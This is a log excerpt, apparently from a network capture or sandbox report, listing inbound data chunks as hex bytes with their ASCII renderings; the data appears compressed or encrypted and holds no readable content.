2022-11-07 22:49:05 UTC	5912	IN	Data Raw: 7f ad 12 0b 85 6f fc 05 cc 7b c9 5c b4 08 10 52 ec 8c 7d bd 6c 4d 30 77 ff 79 53 3f a2 6d 89 7b f6 5f f0 bb f5 77 29 ce e2 61 e1 da 97 f3 7f 2d 7d e0 03 ab eb 66 47 70 8e 16 b4 b1 52 65 03 0f 96 ea a1 aa f0 79 2c 04 5b d7 a7 1b e7 12 f2 77 9f 59 1f 6c 35 09 aa f4 76 10 49 a8 23 f4 e5 7e 3e 53 f5 dd 51 b1 f7 1c 1c ab 11 04 09 70 99 5b 78 6c 50 84 4b f8 61 22 2f 14 f0 07 8f f1 64 63 91 25 db 56 5a 67 4e d8 68 21 41 32 58 b8 59 25 4e f3 7b fc d4 8b f0 76 7e d5 86 de f6 1c 64 b5 60 46 48 e0 40 84 61 99 fa f7 3b 6c d3 48 85 e3 c1 3d 5e 0c 98 ff ea 24 7d 6b f8 3e 92 22 3e d3 0c ff 1b 38 24 a6 19 6c be 53 d3 5e c3 b4 6b 75 7d 45 40 0d 68 d4 1a c9 1f ed 66 0d 33 92 c0 c2 69 08 df 57 02 7e 3b c8 6c bc 6b 98 1a ba af 39 97 0e 50 4b 79 27 95 49 2a 34 f5 f7 2a b3 31 Data Ascii: o{\R}lM0wyS?m{_w)a-}fGpRey,[wYl5vI#~>SQp[xlPKa"/dc%VZgNh!A2XY%N{v~d`FH@a;lH=^$}k>">8$lS^ku}E@hf3iW~;lk9PKy'I41
2022-11-07 22:49:05 UTC	5928	IN	Data Raw: 68 9b ba f3 31 c0 cc c8 28 ca 8e 27 66 28 44 10 c6 8a e1 46 f3 6b 26 50 3f c7 12 f2 8c d5 ab a2 05 ec 4a 48 32 49 ee 45 28 56 34 56 0c d0 89 16 7b 32 16 43 b3 03 ca 27 d4 14 3a 3b 2b 84 a3 28 d6 09 06 78 e5 68 0b 62 f6 2e 94 22 93 2a af c3 9c ea 33 35 fc 26 c4 f3 29 d9 39 c7 cb 40 a3 84 94 86 93 a5 6c 22 f4 5b ec 27 35 b8 3a 28 04 5d b7 55 ed ac 4c 27 32 2d 4e 51 12 0e 33 86 cd fb 7c bf 87 a3 0c af 7b c2 e2 a6 62 23 9e 04 99 4f f6 11 5c 88 75 ef 52 07 44 15 2a f8 77 e0 1e 72 ad 1f 13 ae 87 b0 68 00 32 b6 8b 5e b3 2d 51 8b 91 0a 62 fd 73 b2 b9 4b d0 40 5c 59 3e ba 6b 8f 24 f7 de b3 22 77 b7 22 33 a6 a3 e7 7c d0 49 d3 e3 45 b7 14 74 b5 38 1d fe 44 b1 b4 b1 37 00 fb 16 94 e8 53 57 5e 34 69 3a 71 22 75 65 7a 05 37 38 6d f2 27 66 14 63 df 0a 21 41 43 cb ab 5a Data Ascii: h1('f(DFk&P?JH2IE(V4V{2C':;+(xhb."35&)9@l"['5:(]UL'2-NQ3\|{b#O\uRDwrh2^-QbsK@\Y>k$"w"3\|IEt8D7SW^4i:q"uez78m'fc!ACZ
2022-11-07 22:49:05 UTC	5944	IN	Data Raw: d4 1b f8 6a 7e 3f 91 d4 79 71 ec 72 df aa 2b 34 d0 77 13 6c 07 01 a9 3d 2e 34 78 3e 5e ce d5 a0 76 e8 87 47 7d 4f e7 a7 4f b6 f9 72 e7 2c 10 9b eb a7 6e 0c db 4c af 5e b5 6f 99 b3 50 a2 58 9b 05 55 dd 4a a7 97 e2 50 50 f3 db 6a 76 2a 1e f0 3b 3d b0 5a cc 92 0c fd f9 3b 81 2c 62 0c 55 ef 60 19 b8 1a 9f ad 72 fd 7a 69 e1 9a e2 8f 10 f0 b7 34 61 75 44 2f 96 a5 11 e9 0e e2 aa ab 68 23 ea e5 74 c8 e6 d3 e0 a6 f1 b1 ef 6a 47 42 cc f2 fd f5 f9 a1 45 13 94 0d 5e 72 c4 89 47 e2 ba d5 f3 5a 82 2b e3 2f ec d3 c2 b1 ef 3c 86 03 a7 1a ba 1c 16 73 42 0f 21 61 52 bd c9 af 33 27 c5 45 bf 53 cc 94 03 b3 58 70 ce ee 09 12 f1 07 38 f2 9d 06 5b 8d 48 8c 2a 48 2f 66 85 b6 83 70 40 4e ef d6 38 8e 6c 5c a4 f8 01 54 ee ca ac 2c d3 1a af b8 7d 97 f8 b2 e3 5a 2e bb fe a1 71 ad 9c Data Ascii: j~?yqr+4wl=.4x>^vG}OOr,nL^oPXUJPPjv;=Z;,bU`rzi4auD/h#tjGBE^rGZ+/<sB!aR3'ESXp8[HH/fp@N8l\T,}Z.q
2022-11-07 22:49:05 UTC	5960	IN	Data Raw: a6 91 6a 23 10 73 19 18 b8 70 d6 3b 17 62 2e 31 bc 42 01 db 68 8f 05 79 f9 31 84 6d e4 f3 bd a0 91 43 59 08 93 1f 13 e7 66 97 ac a6 7d ec 3d 84 f0 8c 00 7c 75 1e 44 ab e8 14 af 54 40 ae 7d 33 6e b8 02 cb a9 a7 5f 40 30 5d 03 5c 94 64 b0 e3 f4 5e 64 e9 50 24 58 00 ba d9 78 e6 84 e4 fa 21 3f 79 1d 9d 7a fd fd 52 5d 21 ee 9c 09 9a 75 ba b0 6a 74 f1 63 f9 61 54 46 49 98 18 b5 15 91 ee 1a 2e 9d fa 24 d1 36 7c 63 e1 f5 ff 0f ba e2 29 fe 11 14 81 c2 8c 12 f1 55 60 60 0e 18 b5 23 29 20 47 e7 a6 81 01 75 56 e3 fe 58 b9 92 e2 7c 75 3d 7a ec e8 d0 46 08 e7 e6 52 3c 9b 0d 77 b4 af e3 cd 28 0d 29 e9 88 5f 88 e7 6e 5d e7 27 bd 95 57 11 46 97 f8 e0 96 28 d5 2f a6 00 87 e8 ac 80 21 f1 7b d8 33 aa 9a e4 e3 6a 1d 30 ae 1f 25 5b 4a ce 04 20 43 7e 3e 19 57 8d 5d 69 87 e8 1a Data Ascii: j#sp;b.1Bhy1mCYf}=\|uDT@}3n_@0]\d^dP$Xx!?yzR]!ujtcaTFI.$6\|c)U``#) GuVX\|u=zFR<w()_n]'WF(/!{3j0%[J C~>W]i
2022-11-07 22:49:05 UTC	5976	IN	Data Raw: 1b e8 96 20 e0 d8 06 ad 15 54 c9 c4 43 af 0c 2b 8f d0 94 a5 9d 12 12 88 e8 b6 62 fd fd 08 bf 52 04 3a 8e dc 75 72 b4 5d 63 28 0c ab f0 0c 81 f2 81 af b7 81 ae 00 44 5d 79 d6 cf 56 20 10 80 a5 47 f9 3f 59 c3 d8 56 ed b5 2a 37 22 45 ca c1 a8 51 c5 c5 21 c7 64 77 ac 47 6f df d5 e8 e6 05 fb d8 5c e1 3e 80 7f e5 4f 5a 26 da 5b 33 b7 f8 58 68 9a 45 30 d2 52 f9 46 7c 8e dc d9 7e 34 c8 40 62 92 bf 53 63 27 c0 59 2f 8e 4b 45 55 ea 45 d0 c0 51 e8 05 b1 5d 67 0b 88 b4 c1 1a 77 25 14 e3 47 7b 0f 18 64 78 2e b4 6a bc 04 c1 7c ae 2e d0 7d 89 db 74 be 8d 39 a3 6c 05 55 d2 5b cc 17 7a be 59 61 86 f8 ed dc d4 fb 6a 94 23 ca 48 78 58 98 59 fd 17 52 6a 8a d7 c9 b9 14 1c 53 d1 74 b9 87 f9 d7 50 61 0b 82 0a 3b 33 ba fe 71 4c a2 6b b6 67 46 75 08 a6 19 7e 63 f1 26 db dc 69 be Data Ascii: TC+bR:ur]c(D]yV G?YV*7"EQ!dwGo\>OZ&[3XhE0RF\|~4@bSc'Y/KEUEQ]gw%G{dx.j\|.}t9lU[zYaj#HxXYRjStPa;3qLkgFu~c&i
2022-11-07 22:49:05 UTC	5992	IN	Data Raw: 2b 29 e3 89 26 69 e9 a3 84 9f 29 57 2d 22 62 da 3e 40 cc a3 92 05 8e 56 b6 b2 39 e4 75 e8 be 3b ef e9 51 50 f0 67 3f b4 08 f6 cd 7e c6 2d 99 46 16 9c aa 5d 0f 7e 71 2d e6 22 91 1c 8d e6 76 ee 91 92 19 89 a8 e0 60 24 53 c3 be 16 33 85 75 4f 61 1e 50 8c db 48 32 52 e4 1f 9b 75 12 aa 4b 5d 8d cd 41 bb 25 e6 36 74 7d 30 a4 ae 9c 5a 31 69 ef d3 21 b3 34 07 22 d3 14 78 4d d9 4f b7 57 69 60 a5 9a 4b 62 69 49 92 3e 71 74 db 67 07 3c ce c4 f6 39 d9 d9 88 4f 35 bc c6 6c 28 73 15 00 6d 8e 5b 2b b7 67 b1 64 9c 72 33 b0 13 06 47 29 5e 63 c9 62 95 34 d9 19 76 74 0d fb f6 22 ea 75 11 f2 c5 d1 e5 1a ec 64 87 74 68 e2 4e 8d 2f e7 d1 f1 e8 4b ab 63 0a 57 07 b7 bb 3e 83 1c e8 75 aa 70 dc 14 a1 0e 62 64 94 a8 7c b5 33 42 62 a7 cc 7a 29 f1 3f d7 71 30 26 5e db 5e 22 e5 eb f3 Data Ascii: +)&i)W-"b>@V9u;QPg?~-F]~q-"v`$S3uOaPH2RuK]A%6t}0Z1i!4"xMOWi`KbiI>qtg<9O5l(sm[+gdr3G)^cb4vt"udthN/KcW>upbd\|3Bbz)?q0&^^"
2022-11-07 22:49:05 UTC	6008	IN	Data Raw: 71 67 3c 0b 69 1b a0 74 f0 a4 86 87 5f 6c 11 e3 53 df 1d 67 53 2d 1e 3b ef 49 32 b7 74 4c 27 56 a6 00 95 75 88 5c 36 d3 bc c9 81 46 08 f3 5e 45 70 f8 66 6c e3 da e0 23 d7 ce f2 b9 d4 ea b1 a0 40 47 a8 9d e7 02 0f ec 64 47 3b e7 39 db 5e a8 80 f4 6a 52 ae fa 19 74 3d dd 0c fd e3 bd f1 77 78 21 92 4e 55 88 19 5a fe b0 bb 60 15 65 f9 49 42 01 61 69 c2 94 bd 61 ae 9b 71 fe 1b c3 56 01 64 45 96 d4 4d 77 27 44 49 4a 21 8e f2 eb 55 96 98 ec f4 db 69 5b 81 8a 9b e9 71 70 27 ea fe 25 50 87 b7 66 9a 88 4d cc 0d e9 f3 3b 81 48 7e 8c b7 86 64 e5 6e 01 ad ba ab ae 7a f3 45 c3 e0 fa 91 41 92 53 96 d2 10 a3 7b a1 9f 67 9a e1 24 f4 24 fa 4f 7f 6e c9 23 9d a5 39 59 72 93 64 7f 1f 27 19 ca f9 1c 59 62 29 ad 3b 74 df a0 5e 49 ed cf ad 10 1d 4c 61 5a 55 ea 82 95 a1 0d 29 1c Data Ascii: qg<it_lSgS-;I2tL'Vu\6F^Epfl#@GdG;9^jRt=wx!NUZ`eIBaiaqVdEMw'DIJ!Ui[qp'%PfM;H~dnzEAS{g$$On#9Yrd'Yb);t^ILaZU)
2022-11-07 22:49:05 UTC	6024	IN	Data Raw: 40 e5 49 7c 75 94 ec 55 b6 9a 7b fb 1b 7e f0 54 1a 5a 11 07 8f fb 3f 68 85 ff a2 a5 95 23 1d a4 ed f5 77 d7 48 db dd 02 a3 f8 e5 dc 60 c1 c5 bf 8d b3 0d 37 21 84 71 56 f0 91 f4 c6 71 53 ae af a0 fc 2e 4d e4 7c 6a 3f 93 e9 1b 5d 6b ae 55 11 c4 a0 44 12 55 e4 c6 0d b5 9d 59 5c 28 f2 18 dd 42 50 ee 2e 57 a7 59 e9 74 b3 28 cc e6 ac 02 ef 7c 13 59 77 9c bd 44 f8 3d e5 b5 ac b9 ec dd 26 ae a4 34 68 67 00 67 3a a8 f8 44 d2 89 d4 de 6a 02 82 ae 1f 07 e5 77 3e f3 b9 a3 f1 eb be 71 af e5 f9 f9 eb 57 43 1f 6e e0 31 b5 49 54 5d d3 75 68 02 40 1c a3 77 18 a0 6e a8 4f 20 57 4a 0d 47 19 ee e3 54 21 41 88 f4 ff 33 4c aa 28 2b 76 5f f3 e4 3a c2 2c 0f 73 29 fc fa ab c1 6d 14 cb ad f6 5f fa 13 dd fe ea 9f ce 13 3f 78 12 51 be c9 19 76 47 31 d6 2c 39 20 d7 f4 d3 e0 0a fd 3c Data Ascii: @I\|uU{~TZ?h#wH`7!qVqS.M\|j?]kUDUY\(BP.WYt(\|YwD=&4hgg:Djw>qWCn1IT]uh@wnO WJGT!A3L(+v_:,s)m_?xQvG1,9 <
2022-11-07 22:49:05 UTC	6040	IN	Data Raw: 0d c1 b2 30 60 c8 60 43 13 e2 c1 dc 15 78 eb bb aa e0 05 75 dc 96 54 4d f5 d4 b3 9f 7d 1b 4a 75 2e 42 88 5a 80 ed 7a ae 26 93 01 62 2e 88 30 84 a6 4f 3e 75 68 72 4c 4f 66 88 f9 82 81 b8 8e 49 3e 86 61 e6 68 7f b0 c0 a7 31 a4 b2 15 20 5a 63 c0 32 b4 4e 21 a2 6a 03 4b b1 0a 45 6b be 01 6e b0 1a a1 3e 4e 66 7d 38 a7 ff e4 29 50 62 de 55 81 06 64 be fd 2f 8b 7e ac 3d 42 f6 f4 64 96 a3 14 53 2c 48 49 4b fb d8 45 37 6e 16 62 2b 61 25 bd 9a b7 5b e7 6b 7a e4 7e 47 6f 47 60 73 42 ef 63 6f 18 ee 8f 4b 35 89 a7 98 5d d1 49 80 aa a0 a7 c4 73 af 09 77 09 74 bc cb fb 65 6d 31 47 4b 6a 51 93 c5 20 52 28 71 da 79 76 67 75 b8 24 10 9f a7 94 a4 0c be fc 0a e6 0d c4 5f 89 60 44 ab 40 80 51 18 63 3c 6f 44 79 bb 64 6a 63 68 4b f3 74 73 77 64 6a 65 a2 65 d8 6d f5 2a b6 30 ed Data Ascii: 0``CxuTM}Ju.BZz&b.0O>uhrLOfI>ah1 Zc2N!jKEkn>Nf}8)PbUd/~=BdS,HIKE7nb+a%[kz~GoG`sBcoK5]Iswtem1GKjQ R(qyvgu$_`D@Qc<oDydjchKtswdjeem*0
2022-11-07 22:49:05 UTC	6056	IN	Data Raw: 50 15 ff 96 0d 75 18 40 5e e5 a5 01 64 4d 93 a1 9a a7 05 65 cd f2 37 1f 60 c8 ae e8 91 6b 0f 2b 69 19 89 17 23 37 fb 26 eb 6b 38 d4 e5 c9 bd 2b e7 6d 64 e5 2e cc d3 d3 e3 37 c1 33 c5 f7 64 09 ae 6e 20 10 f6 3c 60 ce b0 18 48 1b ab 0e 3c b9 c0 41 a9 75 fe 0b ba 6a b2 30 16 2f 77 23 de ae f9 64 22 59 4d b2 f3 8d 6e 46 ac ce 18 b1 d1 32 51 f1 df bc 3a 6a 30 ae cb b6 2d 1d 0b 73 03 e4 01 89 dd 2a c8 32 39 9f 4c ef 4b 13 0c 97 45 4b df 6d 32 f2 e2 ce e3 c0 6c 77 7a 4e bf f5 dd 3e a3 99 2a fc cc 3b 4c 3d b2 86 16 96 66 ce 60 1c c9 fa 77 86 c9 f2 59 43 da 18 41 95 2b 28 a2 a8 7a fb 64 74 d4 a9 c7 68 61 dd 78 cd 59 cd e4 7e b7 3a 51 6c b2 94 df 54 74 1d 6c 3b 0f b5 7c cf a3 86 c0 3e f8 42 d6 97 9f 1a 5c 3b 00 c7 bd 36 4e c5 b0 7b d9 14 41 40 7c 67 75 bd 1d a2 62 Data Ascii: Pu@^dMe7`k+i#7&k8+md.73dn <`H<Auj0/w#d"YMnF2Q:j0-s29LKEKm2lwzN>;L=f`wYCA+(zdthaxY~:QlTtl;\|>B\;6N{A@\|gub
2022-11-07 22:49:05 UTC	6072	IN	Data Raw: 13 02 88 2d 45 60 d9 85 b9 f4 aa e7 85 e5 8d 2c 70 f0 7f 3c 86 e4 35 64 73 ca 52 4f bc e5 c0 b8 28 e0 5c 76 5b 88 78 66 44 f5 15 1a 68 60 e6 40 8b 2b 3f 6e 6b e8 f2 7e 8c 7d 56 36 a8 ab 31 b7 70 24 e4 7d 49 de 48 04 6f 93 46 60 06 55 b1 52 af 14 b1 a9 25 14 72 c5 68 b5 38 b4 17 e1 bf 4f f1 4b 10 31 ad ae 0d 24 3e b6 a8 3b 87 a8 7f 9f 77 1c 70 2c df eb a4 7c 24 cd 2f f2 c4 ff 75 49 ca 3c c7 f0 19 ad 08 00 38 13 34 20 28 26 5f a2 f4 e1 ec c1 43 40 2d 35 ca 89 99 37 ea a9 73 cf 41 b9 77 42 50 2a 64 44 66 0b d1 57 ae 28 78 da 10 54 00 74 0a 55 78 60 c2 c4 71 24 23 2b 59 53 f6 a8 a9 e1 dc 29 80 f1 73 44 75 54 e5 9f 3f 30 fc 4d 5b 76 8d d3 02 4f fc 46 f5 fc 24 2b 41 8e 6e d9 a8 13 c9 d8 17 12 29 99 0f c2 74 00 c9 53 11 c1 b4 64 c5 4a e2 a3 65 79 bb 76 e7 28 34 Data Ascii: -E`,p<5dsRO(\v[xfDh`@+?nk~}V61p$}IHoF`UR%rh8OK1$>;wp,\|$/uI<84 (&_C@-57sAwBP*dDfW(xTtUx`q$#+YS)sDuT?0M[vOF$+An)tSdJeyv(4
2022-11-07 22:49:05 UTC	6088	IN	Data Raw: 3b 58 f2 3c 00 38 4f 64 3c e2 49 a3 72 49 eb f7 b4 76 3b 6f be 2b a2 74 6d b8 f7 24 c2 ea dd 1a 7e 6a 88 3d 34 76 c9 33 7c 53 2d 1d 25 71 3e 25 3c d7 c0 0c 64 6a d7 6c 58 f8 c2 74 f1 fe d1 28 d0 87 69 53 ad cd 3d 46 c4 70 1a 5d 99 b7 39 37 da 65 0c 35 09 6e c1 52 30 58 6a 24 db 9e e4 49 37 31 07 e8 48 67 08 a4 55 53 80 6c b6 88 79 ea 6a 63 50 e4 e6 23 8b 6a f1 6c b0 56 f1 61 66 6a c4 d9 d0 dc fe fd cd f6 3c ec a4 a5 67 6f 7d 62 5b 67 42 84 47 d0 e1 ae 3f db 99 53 0f 58 57 32 e6 4c 3c c4 aa a7 29 c6 ea bc db 46 6a ba 59 6e 53 c9 b4 a4 d0 2c ed 41 6c 6d 7b ee 73 68 79 4f bc e2 b7 e5 e9 73 56 46 66 56 b7 2c 68 65 5d e8 30 61 f6 59 bc 40 0b 4a b2 ab c6 7b 5f f6 fd a5 f7 41 40 5b 22 ea d0 46 2b 7b 2c 7e d5 70 91 31 c2 5c 4f 43 29 c5 da 25 a1 ca 31 30 c1 11 58 Data Ascii: ;X<8Od<IrIv;o+tm$~j=4v3\|S-%q>%<djlXt(iS=Fp]97e5nR0Xj$I71HgUSlyjcP#jlVafj<go}b[gBG?SXW2L<)FjYnS,Alm{shyOsVFfV,he]0aY@J{_A@["F+{,~p1\OC)%10X
2022-11-07 22:49:05 UTC	6104	IN	Data Raw: 87 7c a9 bc 4b 4f 3f 05 6f 53 10 75 c6 b7 7d 5f 3f 64 af 64 ba 3d 18 5b 2d 8b ce d3 72 70 b3 fc 04 35 4c 49 96 7a 8c c6 f3 c5 d3 7a 4e 67 68 12 85 7f 75 54 70 5e 89 89 dc 5d 7c 76 f4 c6 92 63 67 eb 63 41 60 6a 1e 64 5b cf 45 2d e6 34 bd 72 fc c0 21 7d 33 c0 1e 2c 31 9a 35 a0 3d 55 17 e9 62 3a 6f 19 18 7f 59 be 58 5f ad a5 8e ae 35 61 3c f1 e5 b5 11 be 58 7d 46 68 bd 76 70 1b 62 79 45 ab 5e b8 7b 27 65 04 32 61 fa 1d 9b dc f2 55 64 7a 3d 41 8d 87 d8 4f 9d 6e c9 16 ef 84 87 c2 6e 7c 10 35 28 0e db 28 43 7b 87 5d 92 6b 67 7b fe f6 6c 4a 28 3f 35 d9 e5 7f ab 7b 31 b5 5f 2a 4e 45 92 e0 d3 58 7c 75 ac cb 21 a5 24 aa 43 23 53 bb e1 71 7d 06 f7 6e b2 a6 71 1c 67 09 3a 59 64 fc f0 a7 6a a4 78 6e e0 44 65 57 c5 83 b2 58 a9 c0 b3 80 1e 63 7a 19 1c 58 53 64 51 29 56 Data Ascii: \|KO?oSu}_?dd=[-rp5LIzzNghuTp^]\|vcgcA`jd[E-4r!}3,15=Ub:oYX_5a<X}FhvpbyE^{'e2aUdz=AOnn\|5((C{]kg{lJ(?5{1_*NEX\|u!$C#Sq}nqg:YdjxnDeWXczXSdQ)V
2022-11-07 22:49:05 UTC	6120	IN	Data Raw: 1e 6f fe 45 46 a0 9f 52 f1 d4 a2 9b 98 a5 47 3c 8b 73 7c a2 7d 4a 26 aa 43 02 ea 90 1a 8e 78 ef 60 fb 4e ef d2 bd f3 83 03 a9 65 a6 60 62 61 6e 41 2d b8 fb 8b 1e 0c 5a f3 e9 e7 d4 dc ff d1 56 1f b7 75 b1 67 79 48 4d e4 14 92 17 23 0c b0 44 eb e9 da bf ff 80 13 c2 bf 93 60 bd 65 43 10 f4 81 10 48 4d 30 1f a6 53 e5 0a fa 89 1f c0 cf c8 af 83 09 fb cb 5a 4f a6 72 57 45 36 3e 18 e8 0c 90 15 b3 4f ca db ae a3 89 ad ac 89 85 6a b5 42 76 4f 76 2d 8b de 57 a2 39 10 f1 40 d4 a1 41 99 1f f7 b6 ab 8e 61 a1 59 74 1d ab 9d da 2e 7f 27 21 00 e4 52 af 1b f4 8a 0d b5 a3 a8 98 7b b8 98 5a 86 f5 31 6f 3d 6a 04 1f f2 83 17 f8 b3 d9 44 b7 ad 96 8e 8b da fb a0 73 b6 5f b8 36 6f 28 6d 0a a6 0b 8a ff 1e e1 52 d6 a8 80 9c 51 da 80 4f 8f 66 a0 57 bc 06 64 23 aa 8a c5 1d 65 19 0b Data Ascii: oEFRG<s\|}J&Cx`Ne`banA-ZVugyHM#D`eCHM0SZOrWE6>OjBvOv-W9@AaYt.'!R{Z1o=jDs_6o(mRQOfWd#e
2022-11-07 22:49:05 UTC	6136	IN	Data Raw: cf 2c fc 6a 77 09 b4 0c ea f7 eb d0 71 fb 25 e9 2d e5 fc cc 7a ee fa 61 6f 75 ab f3 f7 25 61 e3 83 9b 75 aa ed fe 33 fd ef be ba da d5 7f f0 32 57 f8 2f 72 fa d3 d9 88 86 26 f8 fd 74 ef 37 44 ab 9e a6 d2 f4 04 4f 72 f1 c7 f1 35 63 01 57 f8 e4 17 67 aa 0c b5 76 fe f8 22 27 fa d7 64 59 6f 3d 2f f5 c3 76 8a 77 02 fa 16 73 ff 39 ed 64 28 1d be e5 72 0e 70 e7 9a 70 a6 95 28 74 ef 29 f6 3d e0 0d 17 04 24 59 09 bb ee a5 79 ec 55 08 ba 5d 62 a9 46 70 db de fa 28 3c fa e6 cf 7c ca d7 68 7a b3 5d d5 29 4e 90 1b 83 47 c0 81 97 b6 13 aa f9 d2 38 70 f3 b0 2d d8 3e 23 f8 ec 69 a9 05 af 06 39 f1 10 54 28 0c eb b6 d4 c5 de 49 2e 1c cc f3 1f ff 5d 83 f8 d1 c8 c9 e2 3b 6b 39 87 0c 11 ac 4b 73 cd 2e 44 ea d7 0e e9 3b ba ce 23 0b 40 18 0f f5 f9 d3 1d 05 bf fd ab 10 6a 25 fd Data Ascii: ,jwq%-zaou%au32W/r&t7DOr5cWgv"'dYo=/vws9d(rpp(t)=$YyU]bFp(<\|hz])NG8p->#i9T(I.];k9Ks.D;#@j%
2022-11-07 22:49:05 UTC	6152	IN	Data Raw: a5 2f 4a 89 77 5c 9b 8b 32 d2 6f a4 72 09 a9 6b 11 75 6e 7b 9a 24 7b 47 38 30 77 f2 66 e7 70 33 34 16 f9 00 53 5d 6d 45 fb f2 d9 b2 d7 f0 3d 89 4d 1f c5 81 7d 8b bc 58 74 e6 0c ac a1 61 37 63 54 e5 63 32 f4 07 5b a0 f9 8b 0c 06 bf 24 31 77 31 70 2d 35 a6 77 95 37 4e 78 46 23 16 98 c8 68 07 83 1d 72 e8 0d 40 64 fa 5b 43 74 a0 46 15 61 35 da ab 9b 42 25 26 19 39 42 b1 2d 2f 6e 34 bb 46 a2 31 60 14 df 0c d0 68 b9 f9 bf 3c ca 4b 5e 6c 27 02 20 ad b8 9a c1 43 6e c3 e7 5e 2c a2 8d a2 b9 67 f1 6a 6e f3 7c 0e bb 66 95 c0 d5 91 b3 b8 8c c6 84 77 55 a2 75 b6 3d 4b b6 51 b1 64 d7 8b 92 8e b8 81 6d 63 60 48 b1 0a ae 9c 20 9b 7a 5d 1e 9f a8 01 e1 0c 6e b4 b8 7d 12 77 63 79 8b 99 f4 a1 3a 6d c8 5e ae fa 82 07 2c ee e4 41 e3 d8 0e 55 fc 9a 05 5c ac 32 f1 fd 63 c2 bd 88 Data Ascii: /Jw\2orkun{${G80wfp34S]mE=M}Xta7cTc2[$1w1p-5w7NxF#hr@d[CtFa5B%&9B-/n4F1`h<K^l' Cn^,gjn\|fwUu=KQdmc`H z]n}wcy:m^,AU\2c
2022-11-07 22:49:05 UTC	6168	IN	Data Raw: a7 82 56 92 e6 62 f4 a9 4b 7f 29 e3 26 dd c1 b2 23 f9 4a 86 c7 17 a3 dc 75 9d 10 7c e4 d6 f3 d5 af 62 54 08 ae e4 a6 63 2d 8c 59 1f 98 b0 54 da 34 2e 2c a1 0a 25 0d bd 50 cc b9 e1 33 b2 65 9a a5 52 78 ef 2d 8a 5d 71 c6 a5 c6 9c cb 02 69 6e cb 30 01 20 2e b8 93 18 e1 b5 a2 64 a0 2c 73 ee 75 64 8f 39 96 fb 17 d2 8a 7a 84 f1 87 60 bb 04 77 4f c8 97 73 e8 ac e6 bc 5f 00 82 8b df d4 ab 3f ac ac 4f ab 7e a6 a7 5a 30 b3 45 b6 ab a9 ce ea 94 3e 8a cd e4 39 ac bb 0d b8 3e 68 68 69 15 dd 93 70 cb b1 2a df 5e c5 7f 98 c8 1a 6d e2 9f 44 59 d0 91 25 81 c4 f2 ba ba 7b 3e 44 97 15 e3 26 1e e2 52 ae 39 44 4d a9 3d b3 17 3e 15 6a a6 50 e3 22 5f b1 90 a0 91 72 45 5d 6b e5 e6 73 f3 c8 49 69 7e c5 90 05 d0 7b e0 fc 7c 46 44 19 3a 13 6f db b5 6a eb 75 12 e5 63 51 6e fc 2b a8 Data Ascii: VbK)&#Ju\|bTc-YT4.,%P3eRx-]qin0 .d,sud9z`wOs_?O~Z0E>9>hhip*^mDY%{>D&R9DM=>jP"_rE]ksIi~{\|FD:ojucQn+
2022-11-07 22:49:05 UTC	6184	IN	Data Raw: 7e 41 78 37 77 a5 b8 e8 6a 36 4c 6c 31 25 ac 9a 9f 27 16 53 9c 40 d6 31 78 57 e1 67 2c 61 8e a4 6b 0a 30 c0 29 a6 d1 96 06 50 67 49 3c 20 46 9e 10 b6 4d 21 35 54 f5 2f 20 91 b3 67 ce ed f6 61 6e e8 a4 a0 78 77 4d 2c cf 76 6e 6d a4 37 2b 78 60 65 86 80 20 05 c5 30 25 0b 5d 09 23 93 b1 a9 47 be d5 19 1d e0 21 f0 cf 23 51 68 db 64 2f 13 29 5f fd e3 1f 68 4e 66 f6 7a b6 f2 07 c8 aa 4d 38 9e 2f b2 66 6e 6c b9 2c c2 2e aa d5 d7 a0 e2 40 0d 03 9c 67 71 f4 41 79 71 c8 fc 7f c2 65 f2 45 e3 c2 f8 46 1c e8 41 ae 6d a7 ed 3e 10 8d a7 cb 12 7a 71 f1 ba 18 a4 1c 29 5a 37 ad 61 f6 ed e9 00 0e 20 1b d1 9b c2 53 ce 09 81 19 03 be f3 d5 3f 19 27 aa d8 02 a9 0a ce b0 cf a8 ea a0 ac f8 6f c4 75 9e 1b 27 60 74 78 d9 4a fc c9 19 75 0d a3 99 29 a2 6d 53 ed 20 34 32 c3 83 f4 36 Data Ascii: ~Ax7wj6Ll1%'S@1xWg,ak0)PgI< FM!5T/ ganxwM,vnm7+x`e 0%]#G!#Qhd/)_hNfzM8/fnl,.@gqAyqeEFAm>zq)Z7a S?'ou'`txJu)mS 426
2022-11-07 22:49:05 UTC	6200	IN	Data Raw: c4 b3 c7 33 95 d7 f9 aa 56 18 7c bf b6 a1 b1 3b b5 b0 b5 45 d4 2f c7 c6 d9 b0 30 bc 42 b3 fe a5 95 a2 03 3d 01 44 2f db f7 e5 72 af c2 71 d7 15 73 7b 34 cb 8a a5 66 35 fc e8 0a a9 7c 63 45 ff 29 b5 62 39 a7 6c b6 8a ac bc 5c 8e 48 01 c3 31 2b 60 ee ee 75 40 a9 af 90 c1 bf 45 2a 45 9f 0c f3 43 70 49 c7 6d 89 6f bb a4 0b cb eb ff 71 1f 4f 6b 30 9e 46 0b ef c6 b3 72 a3 d7 f6 89 3c 5c 34 a6 df e0 99 4d 3c cd ed e4 9e 1b 56 f5 29 6d 77 7d ad b1 b1 ea 68 be 17 bd ca 27 7d 0a c6 62 56 ab 95 34 39 72 b6 5f 79 3f 13 26 41 e4 96 2d 14 b4 22 ef f1 be de f7 3e f4 ef cf a7 9b 44 a0 dd a6 c8 6c 63 9d a4 a3 85 06 8d f9 7a 2c 82 37 97 53 b4 24 34 09 71 79 71 f7 23 c4 42 43 d5 ee 3f c6 73 8c bb 4e ac 97 ef 71 90 a3 f0 dd c5 c3 4c 80 af 1d e0 a1 f1 bc 77 ab a0 e1 01 55 7f Data Ascii: 3V\|;E/0B=D/rqs{4f5\|cE)b9l\H1+`u@E*ECpImoqOk0Fr<\4M<V)mw}h'}bV49r_y?&A-">Dlcz,7S$4qyq#BC?sNqLwU
